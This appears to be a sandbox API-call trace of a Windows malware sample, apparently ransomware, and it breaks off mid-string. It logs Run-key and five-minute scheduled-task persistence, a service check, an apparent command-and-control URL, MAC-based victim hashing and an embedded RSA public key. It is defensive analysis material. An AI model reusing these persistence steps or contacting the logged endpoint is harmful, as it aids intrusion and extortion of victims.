lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4ec) returned 0x0 [0097.843] RegQueryValueExW (in: hKey=0x4ec, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0097.843] RegCloseKey (hKey=0x4ec) returned 0x0 [0097.843] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x140) returned 0x2a3a720 [0097.843] lstrlenA (lpString="\" --AutoStart") returned 13 [0097.843] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x2af1128 [0097.844] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a3a720 | out: hHeap=0x670000) returned 1 [0097.844] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 1 [0097.844] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x2a3a720 [0097.845] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af1128 | out: hHeap=0x670000) returned 1 [0097.845] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x2af1128 [0097.845] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x2aaf940 [0097.845] CoInitialize (pvReserved=0x0) returned 0x0 [0097.863] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0097.872] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x73b328 [0097.872] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x25ff68) returned 0x0 [0097.890] TaskScheduler:ITaskService:Connect (This=0x25ff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x2af, wReserved2=0x1120, wReserved3=0x2af, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2aa, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x670000)) returned 0x0 [0097.902] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0200 [0097.903] TaskScheduler:ITaskService:GetFolder (in: This=0x25ff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x2700448) returned 0x0 [0097.908] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0200 | out: hHeap=0x670000) returned 1 [0097.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0200 [0097.908] ITaskFolder:DeleteTask (This=0x2700448, Name="Time Trigger Task", flags=0) returned 0x0 [0097.970] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0200 | out: hHeap=0x670000) returned 1 [0097.970] TaskScheduler:ITaskService:NewTask (in: This=0x25ff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x27004a0) returned 0x0 [0097.970] TaskScheduler:IUnknown:Release (This=0x25ff68) returned 0x1 [0097.971] ITaskDefinition:get_RegistrationInfo (in: This=0x27004a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x2700560) returned 0x0 [0097.971] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.971] IRegistrationInfo:put_Author (This=0x2700560, Author="Author Name") returned 0x0 [0097.971] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.971] IUnknown:Release (This=0x2700560) returned 0x1 [0097.971] ITaskDefinition:get_Principal (in: This=0x27004a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x27006f0) returned 0x0 [0097.971] IPrincipal:put_LogonType (This=0x27006f0, LogonType=3) returned 0x0 [0097.971] IUnknown:Release (This=0x27006f0) returned 0x1 [0097.971] ITaskDefinition:get_Settings (in: This=0x27004a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x2700610) returned 0x0 [0097.972] ITaskSettings:put_StartWhenAvailable (This=0x2700610, StartWhenAvailable=1) returned 0x0 [0097.972] IUnknown:Release (This=0x2700610) returned 0x1 [0097.972] ITaskSettings:get_IdleSettings (in: This=0x2700610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x2700680) returned 0x0 [0097.972] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.972] IIdleSettings:put_WaitTimeout (This=0x2700680, WaitTimeout="PT5M") returned 0x0 [0097.972] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.972] IUnknown:Release (This=0x2700680) returned 0x1 [0097.972] ITaskDefinition:get_Triggers (in: This=0x27004a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x27005d0) returned 0x0 [0097.972] ITriggerCollection:Create (in: This=0x27005d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x2700750) returned 0x0 [0097.972] IUnknown:Release (This=0x27005d0) returned 0x1 [0097.972] IUnknown:QueryInterface (in: This=0x2700750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x2700750) returned 0x0 [0097.973] IUnknown:Release (This=0x2700750) returned 0x2 [0097.973] ITrigger:get_Repetition (in: This=0x2700750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x27007a0) returned 0x0 [0097.973] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.973] IRepetitionPattern:put_Interval (This=0x27007a0, Interval="PT5M") returned 0x0 [0097.973] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.973] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.973] IRepetitionPattern:put_Duration (This=0x27007a0, Duration="") returned 0x0 [0097.973] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.973] ITrigger:put_Repetition (This=0x2700750, Repetition=0x27007a0) returned 0x0 [0097.973] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.973] ITrigger:put_Id (This=0x2700750, Id="Trigger1") returned 0x0 [0097.973] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.973] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0097.973] ITrigger:put_EndBoundary (This=0x2700750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0097.974] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0097.974] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0xa07cc300, dwHighDateTime=0x1d8a8ba)) [0097.983] GetLastError () returned 0x0 [0097.983] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x24) returned 0x2a9fbd8 [0097.983] GetLastError () returned 0x0 [0097.983] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0097.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0097.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0097.997] GetLastError () returned 0x0 [0097.997] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x24) returned 0x2a9fb78 [0097.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x2a9fb78, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0097.997] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xa0) returned 0x714b60 [0097.997] GetLastError () returned 0x0 [0098.024] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b26390 [0098.024] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b25b60 | out: hHeap=0x670000) returned 1 [0098.024] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6add70 | out: hHeap=0x670000) returned 1 [0098.024] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0098.024] ITrigger:put_StartBoundary (This=0x2700750, StartBoundary="2022-08-05T13:21:51") returned 0x0 [0098.024] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0098.025] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b26390 | out: hHeap=0x670000) returned 1 [0098.025] IUnknown:Release (This=0x2700750) returned 0x1 [0098.025] ITaskDefinition:get_Actions (in: This=0x27004a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x2700518) returned 0x0 [0098.025] IActionCollection:Create (in: This=0x2700518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x27007e8) returned 0x0 [0098.026] IUnknown:Release (This=0x2700518) returned 0x1 [0098.026] IUnknown:QueryInterface (in: This=0x27007e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x27007e8) returned 0x0 [0098.026] IUnknown:Release (This=0x27007e8) returned 0x2 [0098.026] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0098.026] IExecAction:put_Path (This=0x27007e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 0x0 [0098.026] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0098.026] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0098.026] IExecAction:put_Arguments (This=0x27007e8, Arguments="--Task") returned 0x0 [0098.026] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0098.026] IUnknown:Release (This=0x27007e8) returned 0x1 [0098.026] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x2ab0230 [0098.026] ITaskFolder:RegisterTaskDefinition (in: This=0x2700448, Path="Time Trigger Task", pDefinition=0x27004a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2aa, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x670000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x2700868) returned 0x0 [0098.106] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0230 | out: hHeap=0x670000) returned 1 [0098.106] TaskScheduler:IUnknown:Release (This=0x2700448) returned 0x0 [0098.106] TaskScheduler:IUnknown:Release (This=0x27004a0) returned 0x0 [0098.106] IUnknown:Release (This=0x2700868) returned 0x0 [0098.106] CoUninitialize () [0098.111] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x73b328 | out: hHeap=0x670000) returned 1 [0098.112] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aaf940 | out: hHeap=0x670000) returned 1 [0098.112] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af1128 | out: hHeap=0x670000) returned 1 [0098.112] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6b9a38 [0098.113] OpenServiceW (hSCManager=0x6b9a38, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8490 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aa2868 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b1efe8 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b1f250 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b1f4b8 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab7ab0 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab7d18 [0098.113] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab7f80 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab81e8 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab8450 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab86b8 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab8920 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab8b88 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab8df0 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab9058 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab92c0 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab9528 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4200 [0098.114] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae41a8 [0098.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x2a9fe18, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xf84) returned 0x50c [0098.400] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4200 | out: hHeap=0x670000) returned 1 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9fb48 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab9790 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab99f8 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab9c60 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ab9ec8 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aba130 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aba398 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aba600 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2aba868 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abaad0 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abad38 [0098.400] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x42) returned 0x2ade880 [0098.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ab9790, cbMultiByte=-1, lpWideCharStr=0x2ade880, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0098.400] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.400] lstrlenA (lpString="") returned 0 [0098.400] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a8f0 [0098.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ab99f8, cbMultiByte=-1, lpWideCharStr=0x2a9a8f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a920 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ab9c60, cbMultiByte=-1, lpWideCharStr=0x2a9a920, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a940 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ab9ec8, cbMultiByte=-1, lpWideCharStr=0x2a9a940, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a930 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2aba130, cbMultiByte=-1, lpWideCharStr=0x2a9a930, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a8b0 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2aba398, cbMultiByte=-1, lpWideCharStr=0x2a9a8b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a910 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2aba600, cbMultiByte=-1, lpWideCharStr=0x2a9a910, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.401] lstrlenA (lpString="") returned 0 [0098.401] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a8e0 [0098.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2aba868, cbMultiByte=-1, lpWideCharStr=0x2a9a8e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.401] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.402] lstrlenA (lpString="") returned 0 [0098.402] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a8c0 [0098.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2abaad0, cbMultiByte=-1, lpWideCharStr=0x2a9a8c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.402] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.402] lstrlenA (lpString="") returned 0 [0098.402] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2) returned 0x2a9a890 [0098.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2abad38, cbMultiByte=-1, lpWideCharStr=0x2a9a890, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.402] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0098.402] lstrlenW (lpString="") returned 0 [0098.402] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x12) returned 0x2aa91b8 [0098.402] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x288) returned 0x2b1f720 [0098.402] GetAdaptersInfo (in: AdapterInfo=0x2b1f720, SizePointer=0x18ea04 | out: AdapterInfo=0x2b1f720, SizePointer=0x18ea04) returned 0x0 [0098.696] GetAdaptersInfo (in: AdapterInfo=0x2b1f720, SizePointer=0x18ea04 | out: AdapterInfo=0x2b1f720, SizePointer=0x18ea04) returned 0x0 [0098.710] GetLastError () returned 0x0 [0098.788] GetLastError () returned 0x0 [0098.789] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x6c9b98) returned 1 [0098.791] CryptCreateHash (in: hProv=0x6c9b98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0098.791] CryptHashData (hHash=0x2a73b18, pbData=0x2b22988, dwDataLen=0x11, dwFlags=0x0) returned 1 [0098.791] CryptGetHashParam (in: hHash=0x2a73b18, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x11) returned 0x2aa9338 [0098.791] CryptGetHashParam (in: hHash=0x2a73b18, dwParam=0x2, pbData=0x2aa9338, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x2aa9338, pdwDataLen=0x18e9d8) returned 1 [0098.791] GetLastError () returned 0x0 [0098.791] CryptDestroyHash (hHash=0x2a73b18) returned 1 [0098.791] CryptReleaseContext (hProv=0x6c9b98, dwFlags=0x0) returned 1 [0098.796] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b22988 | out: hHeap=0x670000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdb70 [0098.796] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdfd0 | out: hHeap=0x670000) returned 1 [0098.796] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6b9998 | out: hHeap=0x670000) returned 1 [0098.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xf88) returned 0x530 [0099.082] WaitForSingleObject (hHandle=0x530, dwMilliseconds=0xffffffff) returned 0x0 [0100.549] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x538 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9f818 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abafa0 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abb208 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abb470 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2abb6d8 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac12b0 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac1518 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac1780 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac19e8 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac1c50 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac1eb8 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3e0) returned 0x2b249b0 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5ec) returned 0x2b32498 [0100.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2b32498, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC 